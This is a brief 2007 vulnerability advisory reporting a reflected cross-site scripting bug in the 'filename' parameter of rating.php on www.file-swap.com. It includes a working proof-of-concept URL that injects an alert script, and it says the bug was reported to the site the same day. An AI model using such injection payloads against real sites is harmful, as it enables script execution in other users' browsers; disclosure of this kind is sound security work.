kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.file-swap.com
+ Version:
2007.06.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ www.file-swap.com Description:
Give one file - get one free !
+ Description:
XSS IN:
http://www.file-swap.com/rating.php?filename=tak%22);alert('zupa');%3C/script%3E
Sent data:
");alert('zupa');</script>
Its nothing special, because this site is without any kind of authentication.
Timeline:
2007.06.04 bug discovered
2007.06.04 bug sent via http://www.file-swap.com/info/contact
Original Advisory: http://kaneda.bohater.net/security/20070604-xss-file-swap.com.php
Check my other bugs in security section: Security